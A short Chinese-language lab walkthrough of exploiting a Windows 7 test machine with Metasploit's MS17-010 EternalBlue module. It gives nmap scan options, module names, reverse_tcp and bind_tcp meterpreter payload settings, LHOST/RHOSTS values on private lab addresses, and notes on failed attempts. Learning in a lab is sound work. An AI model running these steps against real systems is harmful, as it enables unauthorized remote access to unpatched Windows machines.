先说下问题和结果
ms17-010 攻击失败
ms17-010 fail
可以尝试以下两个payload
set payload windows/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/bind_tcp
然后就成功了
零、开始
靶机镜像最好是老镜像或者没有保护的镜像,防火墙啥的都给关了。
nslookup domain [dns-server]
被动嗅探
然后nmap主动嗅探
推荐选项:-sS 使用它来执行一次隐秘的TCP扫描 -Pn 告诉nmap不要使用ping命令预先判断主机是否存活
推荐命令:nmap -sS -Pn 192.168.4.10
进入msf,使用ms17-010扫描器exploit
一、针对win7使用以下模块
use exploit/windows/smb/ms17_010_eternalblue
ms17_010_eternalblue这玩意只能用来攻击win7、win2008。
我之前用32位winXP靶机,攻击不了。初学者不懂这么多。
后来才知道 winXP应该用 exploit/windows/smb/ms17_010_psexec
show options
二、设置攻击载荷
set payload windows/meterpreter/reverse_tcp
三、设置一下LHOST攻击机192.168.137.4和RHOSTS靶机192.168.137.10
LPORT 攻击机端口8888(随便设,只要不冲突就行)
四、开始攻击
run
此时遇到好几次win7将在1分钟内自动关机,老夫不知道为啥,可能这个win7镜像比较新,有一点保护,fail是常态,大家可能试一下会成功。
五、更换载荷
set payload windows/x64/meterpreter/bind_tcp
show options
切换成功,继续攻击,得到开始的结果(此时还有可能引起win7重启)。